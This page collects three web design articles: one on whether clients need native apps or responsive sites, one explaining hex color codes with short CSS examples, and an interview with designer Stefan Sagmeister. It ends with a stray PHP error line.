    For us, mobile is new and exciting and spells the future for our industry and careers. Unsurprisingly, we want to be a part of that. This scenario is not dissimilar to the one that many print designers found themselves in, all those years ago. When the Internet arrived and everybody was desperate to get their first website, the print design world skilled up and got building. Many websites were built in those early days that were never visited by an actual user. For many, the excitement got ahead of the demand.

    Nothing is wrong with us as a community wanting to move into new areas. Nevertheless, we need to ensure that we do not push solutions onto our clients that they do not yet need, simply to boost our portfolio.

    Do Our Clients Need To Think Mobile Yet?

    Timing is everything. For businesses that are trying to turn a profit, their return on investment (ROI) matters.

    Although mobile is important, it still amounts to a very small percentage of the overall traffic for many organizations. So, quite often, optimization for mobile lands at the bottom of the design debt list — the list of issues that have to be addressed by the design team. Business considerations, particular features and technical issues in the shop often have a higher priority, especially if the client’s company is relatively small.

    While investing in the future is, of course, important to the client, if they do so too early, they run the risk of investing their money in areas that don’t have an immediate result and that might become out of date just at the moment when the areas become relevant to the client. Helping them work through this timing issue is important for us, as service providers.

    Wait a second! If we build our websites mobile-first, surely they won’t go out of date, right? I am not so convinced. Certainly, best practice in responsive design are not the same as they were a year ago. We are learning more all of the time, and best practices continue to evolve. Can you honestly claim that the code and design solutions you came up with a year ago are as good as the code you are writing today? Responsive design patterns emerge and change, CSS and JavaScript techniques evolve, and some solutions don’t stick around for a long time.

    Percentage of mobile traffic on one example site
    For many websites, the percentage of mobile traffic is still relatively low.

    It’s difficult because many clients are just as excited as us about mobile. They want to build a mobile app or website because they love playing with their shiny new device. They know that mobile is the future and, so, convince themselves that now is the right time to invest. But it might not be right for their circumstances. Mobile might not yet be worth spending their budget on. Timing is everything when considering ROI.

    The Cost Of Native

    Among shiny things, native apps are the shiniest of all. Whatever arguments you may have against building native apps, if you put your bias aside (we all have bias), it is difficult to argue — at least to our clients — that native is not cool, slick and shiny.

    In my experience, when most clients think mobile, they think apps. You don’t see TV advertisements promoting mobile websites, but a lot of ads promote app stores and native applications. Clients might not know the difference between native and hybrid — and our responsibility is to explain the difference to them — but when they think “apps,” they want “cool, shiny and in the app store.” They want a native app.

    However, such apps are expensive. You need developers with a specialized skill set. It might sound obvious, but building apps is very different from building websites. Apps are software. Software projects need more rigorous planning and longer testing cycles, and so they take longer to complete.

    And then you have to consider multiple platforms. If you go the native app route, then each time you roll out an app to a new platform (Windows, iOS, Android, BlackBerry), you have to do a lot of the work again. Usually little can be reused. Also, operating systems are updated a couple of times a year, and there will be at least one new device each year, too. These changes usually require apps to be updated as well. Of course, when dealing with Apple at least, there is no guarantee that your app will be approved and added to the store for customers to download.

    You can reduce the costs involved by using hybrid app solutions and HTML5. The hybrid and native approach each has its pros and cons and its own place, but the bottom line is that app development is an expensive business.

    The Hidden Costs Of Responsive Design

    There may well come a time when we need to build bespoke versions of websites for mobile devices. As users replace laptops with tablets and many others access the Web only on their phones, such a move would be a worthwhile investment for some organizations. In the meantime, for everyone else, responsive design is a good solution. Because it applies a new style sheet to the client’s existing HTML implementation, it need not be costly to implement.

    At least that is the theory. In reality, things are more complicated. We all claim that responsive design is a cheap solution, but that depends on how far we take it. At the most basic level, responsive design just requires some changes to the CSS. However, we all know in practice that that is not always the case. Making an existing website responsive can be incredibly time-consuming, especially if you have to deal with legacy HTML code that can’t be easily changed.

    The Special Cases

    Responsive design is not as simple as linearizing the content. Many elements need special attention. The most obvious is navigation, which often scales poorly across devices. However, it is not the only element. Maps, video, slideshows, graphics and tables all need special attention. Also, third-party “widgets” that embed content on a website aren’t always configured to be responsive.

    Example of desktop navigation
    Navigation does not always translate easily to mobile devices.

    The Cost of Imagery

    Then there is the biggest challenge of all: images. Many Web designers are rightly suggesting that delivering desktop-sized images to mobile devices is unadvisable due to bandwidth limitations. We also now need to consider devices with high-pixel-density displays, which require even larger images. However, optimizing images for different platforms and creating a mechanism to deliver these further increases the cost of responsive design. At some point, you have to consider client-side and/or server-side optimizations to address this and other issues, such as reducing the load of elements that won’t be displayed on mobile devices.

    There is even talk now of the need to optimize typography so that it scales for different devices. Again, the idea has a lot of merit, but a price tag comes with it. The problem is that we as Web designers want to be seen by our peers as producing websites that use the absolute latest best practices. God forbid that we are seen coding with last year’s techniques!

    Giving Our Clients The Best Deal In Mobile
    Now, screens are changing not just in size, but also in pixel density. Oliver Reichenstein suggests that we do not just need responsive layouts, we also need responsive typefaces. He has launched iA’s new website with responsive typography with a custom-built responsive typeface.

    Of course, our desires are not what matters. What matters is that we provide our clients with solutions that make sense for them. This often entails providing a solution that we consider to be inferior. Not every client needs a Rolls-Royce — some will be happy with a Skoda.

    The question is how do you know which solution best fits a client.

    Picking The Right Solution

    As I have already suggested, ROI should be the primary criterion in determining the right approach. If a client has a large audience that is willing to pay good money for an app, then you can go to town and build a Rolls-Royce. But if the project is more speculative, then starting simple would be best.

    But money should not be the only deciding factor. The choice between a native app and a responsive website, for example, is not really a budgetary one. After all, a responsive website could cost more than some native apps.

    In some cases, the decision will come down to what the app will do. If the client’s primary requirement is to deliver content to the user, then a responsive website is probably more appropriate. In my experience, the kinds of native apps that users download and continue to use are task-oriented. If your client wants to enable users to complete certain tasks quickly, then a native app might be the answer. Otherwise, use the Web.

    The only exception is when the client needs to access features on mobile devices that are inaccessible to the browser. Typical examples are things such as the camera and the accelerometer.

    If you conclude that a Web-based solution is the right approach, then it becomes an issue of budget and timing. If the client is happy with their existing website and doesn’t wish to change it, then you could consider building a mobile website that targets particular devices. This might not be your preferred approach, but it could be the most cost-effective until the client undertakes a redesign.

    If the client’s budget is tight, then you might choose to use media queries to target certain ranges of screen resolutions, rather than going fully responsive. This will make development slightly easier, thus keeping costs down. Similarly, you would have to leave image optimization to the carrier, rather than optimize images on the server.

    The message here is simple. Whether talking about native apps, responsive websites or anything in between, we need to put aside our personal desires and even the desires of the client, focusing instead on what the client really needs: a mobile solution that generates the best return for their business.

    (Image credits on the front page go to Information Architects.)

    (jc) (al) (il)

    © Paul Boag for Smashing Magazine, 2012.

  • Hex Colors: The Code Side Of Color


    The trouble with a color’s name is that it never really is perceived as the exact same color to two different individuals — especially if they have a stake in a website’s emotional impact. Name a color, and you’re most likely to give a misleading impression. Even something like “blue” is uncertain. To be more precise, it could be “sky blue”, “ocean blue”, “jeans blue” or even “arc welder blue”.

    Descriptions vary with personal taste and in context with other colors. We label them “indigo”, “jade”, “olive”, “tangerine”, “scarlet” or “cabaret”. What exactly is “electric lime”? Names and precise shades vary — unless you’re a computer.

    Code Demands Precision

    When computers name a color, they use a so-called hexadecimal code that most humans gloss over: 24-bit colors. That is, 16,777,216 unique combinations of exactly six characters made from ten numerals and six letters — preceded by a hash mark. Like any computer language, there’s a logical system at play. Designers who understand how hex colors work can treat them as tools rather than mysteries.

    Breaking Hexadecimals Into Manageable Bytes

    Pixels on back-lit screens are dark until lit by combinations of red, green, and blue. Hex numbers represent these combinations with a concise code. That code is easily broken. To make sense of #970515, we need to look at its structure:

    The first character # declares that this “is a hex number.” The other six are really three sets of pairs: 0–9 and a–f. Each pair controls one primary additive color.

    Hex Reading
    The higher the numbers are, the brighter each primary color is. In the example above, 97 overwhelms the red color, 05 the green color and 15 the blue color.

    Each pair can only hold two characters, but #999999 is only medium gray. To reach colors brighter than 99 with only two characters, each of the hex numbers use letters to represent 10–16. A, B, C, D, E, and F after 0–9 makes an even 16, not unlike jacks, queens, kings and aces in cards.

    Diagram showing how hex colors pass above 0-9

    Being mathematical, computer-friendly codes, hex numbers are strings full of patterns. For example, because 00 is a lack of primary and ff is the primary at full strength, #000000 is black (no primaries) and #ffffff is white (all primaries). We can build on these to find additive and subtractive colors. Starting with black, change each pair to ff:

    • #000000 is black, the starting point.
    • #ff0000 stands for the brightest red.
    • #00ff00 stands for the brightest green.
    • #0000ff stands for the brightest blue.

    Subtractive colors start with white, i.e. with the help of #ffffff. To find subtractive primaries, change each pair to 00:

    • #ffffff is white, the starting point.
    • #00ffff stands for the brightest cyan.
    • #ff00ff stands for the brightest magenta.
    • #ffff00 stands for the brightest yellow.

    Mixing additive colors to make subtractives

    Shortcuts In Hex

    Hex numbers that use only three characters, such as #fae, imply that each ones place should match the sixteens place. Thus #fae expands to #ffaaee and #09b really means #0099bb. These shorthand codes provides brevity in code.

    In most cases, one can read a hex number by ignoring every other character, because the difference between the sixteens place tells us more than the ones place. That is, it’s hard to see the difference between 41 and 42; easier to gauge is the difference between 41 and 51.

    Diagram emphasizing the first character in each pair of characters

    The example above has enough difference among its sixteens place to make the color easy to guess — lots of red, some blue, no green. This would provide us with a warm violet color. Tens in the second example (9, 9 and 8) are very similar. To judge this color, we need to examine the ones (7, 0, and 5). The closer a hex color’s sixteens places are, the more neutral (i.e. less saturated) it will be.

    Make Hexadecimals Work For You

    Understanding hex colors lets designers do more than impress co-workers and clients by saying, “Ah, good shade of burgundy there.” Hex colors let designers tweak colors on the fly to improve legibility, identify elements by color in stylesheets, and develop color schemes in ways most image editors can’t.

    Keep Shades In Character

    To brighten or darken a color, one’s inclination is often to adjust its brightness. This makes a color run the gamut from murky to brilliant, but loses its character on either end of the scale. For example, below a middle green becomes decidedly black when reduced to 20% brightness. Raised to 100%, the once-neutral green gains vibrancy.

    A funny thing happens when we treat hex colors as if they were increments of ten. By adding one to each of the left-hand character of each pair, we raise a color’s brightness while lowering its saturation. This prevents shades of a given color from wandering too closely to pitch black or brilliant neon. Altering hex pairs retains the essence of a color.

    Diagram showing how hex affects brightness and saturation

    In the example above, the top set of shades appears to gain yellow or fall to black, even though it’s technically the same green hue. By changing its hex pairs, the second set appears to keep more natural shades.

    Faded Underlines

    By default, browsers underline text to denote links. But thick underlines interfere with letters’ descenders. Designers can make underlines less obtrusive by scaling back hex colors. The idea is to make the tags closer to the background color, while the text itself gains contrast against the background.

    • For dark text on a bright background, we make the links brighter.
    • For bright text on a dark background, we make the links darker.

    To make this work, every embedded link needs a <span> inside of every <a>:

    a { text-decoration:underline;color:#aaaaff; }

    a span { text-decoration:none;color:#0000ff; }

    Example of underlines that pale compared to the clickable text

    As you can see here, underlines in the same color as the text can interfere with parts of type that drop below the baseline. Changing the underline to resemble the background more closely makes descenders easier to read, even though most browsers place underlines above the letterforms.

    Adding spans to every anchor tag can be problematic. A popular alternative is to remove underlines and add border-bottom:

    a { text-decoration: none; border-bottom: 1px solid #aaaaff; }

    Better Body Copy

    A recurring design problem is that a specific color may be technically correct but has an unintended effect. For example, some designs call for headers and body copy to be the same color. We have to keep in mind that the thicker the strokes of large text appears, the darker the small text appears.

    Example of text that, while technically correct, appears too bright

    h1, p { color: #797979; }

    Example of text technically darker but visually the same

    h1 { color: #797979; }

    p { color: #393939; }

    While technically identical, the body of the copy is narrower, and more delicate letterforms make it visually brighter than the heading. Lowering the sixteens places will make the text easier to read.

    How To Warm Up Or Cool Down A Background

    Neutral backgrounds may be easy to read against, but “neutral” doesn’t have to mean “bland”. Adjusting the first and last byte can make a background subtly warmer or cooler.

    Examples with slight background color variations

    • #404040 — neutral
    • #504030 — warmer
    • #304050 — cooler

    Is that too much? For a more subtle shift, use the ones places instead:

    Examples of very slight variations in background color

    • #404040 — neutral
    • #594039 — warmer
    • #394059 — cooler

    Coordinate Colors With Copy-Paste

    Recognizing the structure of a hex number’s number/letter pairs gives designers a unique tool to explore color combinations. Unlike color wheels and charts, rearranging pairs in a hex number is a simple process to change hues while keeping values similar. As a bonus, the results can be unpredictable. The simplest technique is to move one pair of characters to a different spot, which trades primary colors.

    A common design technique to make text or other visual elements coordinate with a photo is to use colors from within that photo. Understanding hex colors can take that a step further, by deriving new colors that coordinate with the photo without taking directly from the photo.

    Examples of how swapping primary colors can yield coordinated but interesting results

    Going Forward

    Don’t let the code intimidate you. With a little creativity, hex colors are a tool at your disposal. If nothing else, next time someone asks if you can solve a problem with code in any language, you can simply say:

    “Shouldn’t be harder than parsing hexadecimal triplets in my head.”

    Further Reading

    You may be interested in the following articles and related resources:


    © Ben Gremillion for Smashing Magazine, 2012.

  • Interview: Stefan Sagmeister: “Trying To Look Good Limits My Life”


    Stefan Sagmeister is a designer who has been following his instinct and intuition to the fullest, having gained recognition for his unique, and often provocative, visual explorations. It’s possibly his very personal and almost self-centric way to design that leads to his original approach. On May 31, 19 years after starting his NYC studio he once again surprised the crowds with renaming to Sagmeister & Walsh in a ‘trademark’ Sagmeister fashion – naked in the studio.

    A bit of history. When the Austrian-born Sagmeister moved to New York, he made it his mission to work for the legendary designer Tibor Kalman (1949-1999), at M&Co before starting his own studio in 1994. Sagmeister inc. Kalman, one of the two names that changed graphic design in the 80’s—as AIGA proclaims—was well respected for his social responsibility polemic and then as the editor-in-chief of Colors magazine.

    Sagmeister earned Grammys for his iconic music packaging art (see his David Byrne CD covers). With his poster designs for the AIGA, as well as a slew of heralded personal projects, it’s safe to say that his status as a design superstar has been cemented. He also obtained a Lucky Strike Designer Award in 2009. There are two published monographs on his work, “Things i have learned in my life so far” (2008) and “Sagmeister, Made You Look” (2001) that are often found on designer’s bookshelves.

    He’s also known for taking yearlong sabbaticals every seven years out of studio, which is obviously good for creativity and well being (if one can afford it).

    Sagmeister's notorious AIGA poster in which the message was cut into his skin.
    For the 1999 poster for his AIGA detroit lecture Stefan asked his intern Martin to cut out the lettering on his skin. If you want to be original you must be able to take the pain. Photography: Tom Schierlitz

    Grammay winning design for David Byrne
    The Grammy award-winning design of this album features happy, angry, sad and content David Byrne dolls.

    He advocates keeping it simple, which he believes has huge benefits and routinely takes a sabbatical break every seven years to recharge and reflect creatively.

    This is yet another timeless and in English previously unpublished interview conducted by Spyros Zevelakis, when he met with Sagmeister at TypoBerlin ‘Image’ in 2008.

    Stefan_Sagmeister ©
    Stefan_Sagmeister ©

    Q: Do we have to gather in the economical centres of the world in order to do better graphic design?

    Design by its own definition, not only communication design but also product design—from a broader point of view, they’re about the interaction of humans. Now, you have more interactions of humans in cities. Bigger concentration, much higher density than you’d have in the countryside. Consequently, as a designer, I’m invited a lot to different places around the world, and they’re almost without exception cities. So, there is now just much higher usage of design and products, but also in the making of them, and in the thinking about them.

    At the same time though, technology allows us to do fantastic work anywhere. And this is true for young designers. I’ve seen colleges outside of cities. They do amazing work that uses the remoteness, as part of their limitations [as designers], and turn it to their advantage. I’ve also seen design companies, being in provincial areas, who do brilliant work.

    Q: So, in the years to come, will designers be more able to live anywhere and do work anywhere?

    In a sense, I would say, because you can technically do it. But, obviously, the density of information and the experiences will be probably more for the cities than the countryside. So, I could see this working beautifully for a limited period of time, and I’m actually going to move for a year to the countryside to do exactly that—try a different style of working. I will be in Indonesia, quite far away from any urban centre. I’d have to fly to Jakarta or Singapore. That’ll be for a year, but I don’t think that I’d want to do this for the rest of my life.

    Everybody always thnks they are right.
    Illustrated by Monika Aichele in Germany and built by Sportogo in California, each monkey held a banner containing one word of the sentence, the whole sentiment only completed for a viewer visiting all cities, or through the media.

    Q: Which was there the point in your career that you managed to start working on your own terms? Was it difficult in the beginning?

    From a single point of view, even as a student, I looked for jobs that allowed work that I thought was good. And for sure, when we started the studio, right from the start, we tried to do work that we could be satisfied with. That’s what I felt it was best doing. I don’t think that you can open a studio and do mediocre work to make money and somehow switch over to good stuff. I haven’t seen it happen. Because everything that they [your clients] do, reflects on everything that you do. If you do a lot of mediocre work, it’s going to attract a lot of mediocre clients.

    Q: Where there sacrifices you had to do to allow yourself this freedom?

    There were not many sacrifices involved. What I did, was that I designed a situation for myself, where the studio would need very little money. Our overheads were very, very small, so we didn’t get into this “difficulty” of having to have a lot of income coming in and then having to take on jobs that we wouldn’t be happy with.

    The new EDP identity.
    The new EDP identity is built using four fundamental shapes: a circle, half circle, square and a triangle. These four shapes were combined and layered to build 85 unique EDP logomarks resulting in a modular identity.

    Q: Are you bothered about the distinctions between the arts and design?

    As a consumer or viewer of art and design I don’t care. As a consumer my question is if it’s good or not, not if it’s art or design. As a do-er [creator/maker of it], somehow I have to care. I’ve been asked here and there about it… and on a daily basis there is a distinction as far as the media, distribution methods and functionality of the pieces is concerned. I think that design pieces at large need to be functional, while art pieces at large don’t have to be functional, just be—they don’t have to actually do anything.

    Q: In this way you differentiate your work from a fine artist’s work?

    Yes, exactly.

    Description of the image.
    The billboard for the Experimenta in Lisbon is made out of newsprint paper. We took advantage of the fact that newsprint yellows significantly in the sun.

    Q: Designers are active in the discussion of more ethical and responsible practice. Many seek to work for clients committed to a social responsibility (charities etc). In general however, the designer is working for the industry, and often, it may be questionable how seriously big corporations take contemporary issues (like sustainability) outside their PR and marketing agenda. What’s your view on this contradiction? On the one hand designers are sensitive to issues, on the other hand, they do best in strong economies (capitalism).

    I’m not sure I have very interesting things to say about it. I do believe that it’s going to be some middle-ground over the two. I think that capitalism long ago has found the middle ground. I talked yesterday to a woman who works at Mercedes. She said that they are investing $14 Billion over the next 3 years in environmentally friendly technology. Now, so much money from this company, I actually didn’t believe her at first and then she emailed her boss to get the actual numbers. Mercedes’s annual profit is $4 Billion dollars. So to put [nearly] 3 years worth of profits, solely into environmentally friendly technologies…

    I would like to see the design company who puts its entire profit into the same thing. It seems to me, if those numbers proved to be true, that some big industry people are much more responsible than the design community. I do see big businesses having some quite inspiring leadership. Therefore, I don’t see that one has to go above the other. In general, I’m a big believer in the human spirit and I think that, centuries after centuries, we are actually getting better and better. By looking at our past and our progress, it seems that we have a good future.I’m not sure that the PR and marketing of big corporations is the mere drive for a more responsible approach.

    On the other hand, I have seen the design community react to catastrophes in the most superficial and silly fashion. I remember back at 9/11, the overall response of the design community in New York was to design stupid logos, and load them to the AIGA website. But I do know a lawyer who organised the law community. They did actual beneficial things for their communities. I don’t think that the design community can claim at all to have a leadership in any of these subjects. And even because it’s quite fashionable to slag large corporations, I sometimes see a much more efficient and much more professional and effective way from individual designers.

    Identity and packaging design for Aishti, Aizone, and Minis department stores.
    Identity and packaging design for Aishti, Aizone, and Minis department stores.

    Q: Back to graphics, you’re a letterer and you enjoy the craftsmanship. Is it equally important for you, the form of the letterforms and the medium (that dictates the outcome)?

    Both yes. Actually, even when we produce something that is made out of something, the form is not totally driven by that one medium. I’ll give an example. When we did the world limits swimming around in the swimming pool, we sketched that out before, because I didn’t want this air conditioning, tubing material, that we made it out from, solely to dictate the form of that work.

    Q: Is craftsmanship a way to be unique in the digital era?

    Well, I think it was maybe 10 years ago. Specifically, when modernism first came back, and everything was suddenly cold and machine-like, it made a lot of sense to introduce handwriting, but also to introduce a higher level of craft. Right now, craft in almost all artistic directions is a very hot topic. Start with product design, but in art, crafts coming back big time, you see the German painters, who can actually paint, having an unbelievable career. We went through such a long term, maybe two or three decades, where craft didn’t play a role at all, and I mean consciously it didn’t. People who could paint, consciously did not paint.

    In general, craft is just a function of knowing your tools really well. Knowing your tools very well, on the one hand can be an advantage. On the other hard, I’ve also seen people hooked back into their tools that they know so well, and they stay in their small little section [world] and can’t really get out to see the bigger picture. Personally, I’m most comfortable to go in and out.

    A wall of bananas
    “At the opening of our exhibition at Deitch Projects in New York we featured a wall of 10,000 bananas. Green bananas created a pattern against a background of yellow bananas spelling out the sentiment: Self-confidence produces fine results. After a number of days the green bananas turned yellow too and the type disappeared. When the yellow background bananas turned brown, the type (and the self-confidence) appeared again, only to go away when all bananas turned brown.” – Stefan Sagmeister

    Q: Art colleges in Europe don’t seem to teach much crafts any more, do they?

    In design education, they are much more about what the world does right now. Interestingly, in most graduate schools, being technically good at something is almost a bad word if you’re talking about contemporary craft. Somebody who is very good in photoshop, is almost universally despised at a grad school. It’s silly. I’m not saying that I’m a friend of people who can do just that and can’t think, but I think a combination of skills matters.

    Q: Where do you think design education is going?

    I could only give you a superficial answer to it, simply because colleges are a very vast system. There are colleges and universities that do a fantastic job. I just came back from the Royal College of Art in London. I saw the work of six design students. And five of them were fantastic, work of a very high level. I also see people in Holland doing work that I can assure you, is far more advanced that anything I was thinking of when I was 23. Much more sophisticated. Their education is so much better, they know much more, they have much more experience than I had at that age. I’m not quite sure why this is. Is it because I have the chance to see these people now? Or because I just never met them when I was 23? But then I see the opposite, people who are being taught by bad professors, and they’re not that successful. So there is a very wide spectrum out there, and if I would be a student now, I would have to do some serious research. Which is relatively easy to do—just look at the work of graduate students, you can tell immediately.

    Talkative Chair.
    The text of this chair simply refers to a diary entry written while sitting on our balcony in Bali, where the chair itself would ultimately be placed.

    Q: So, do you think that it depends massively on the school and their practice or philosophy, or the country of study?

    Oh no, of course there are a couple of star schools across the world, and there are some countries that really figured out how to school design education—Germany being one of them. If I would have to pick one, anywhere in [the world] where I can see the most, I’d think of Germany. Considering that these four, five schools, don’t refer to themselves as being the best… I think education here (Germany) is fantastic! If I would live in a country, like the US, where art education is unbelievably expensive, I’d probably go through the trouble to learn the German language and get my education there. I know that there are protests here because they are now paying €500 a semester here. And you pay $18,000 a semester in the in the US. And education is really good. I talked to teachers that are very good designers, and the government pays them salaries that they can give up a part of their profession, and it’s actually doable.

    In the US if you teach you can do it as a hobby. I do teach 3 hours a week, but I can’t be available to my students during the week. I just talked to [a designer who] I think is the best poster designer alive. He’s teaching in Stuttgart, and he has all he needs, [which] allows him to leave a part of his practice and take teaching seriously. And he does that. And you see the outcome, because he’s available to his students. On the contrary, in the US and many other countries you have to do either teaching or design. Although there are great designers also doing full time teaching, you have mediocre [medium level] designers who become full time faculty staff.

    This may be a generalization, but you certainly have people who flee to academia because they’re not that good in real life. Then, of course, they will have the time to lead the students. At the same time, people who are very good outside, they can only come in very punctually. That’s why I think, actually, the current system here seems to work brilliantly, where very good designers can dedicate a serious amount of their lives to teaching.

    Trying to Look Good Limits My Life.
    Trying to Look Good Limits My Life – real world typography produced by Sagmesiter for one of his personally-driven projects.

    Be sure to check out the Sagmeister studio live via the website.

    (jc) (il)

    © Spyros Zevelakis for Smashing Magazine, 2012.

Fatal error: Call to undefined function get_edit_user_link() in /home/content/43/9267243/html/nique/wp-content/themes/flat-theme/functions.php on line 1155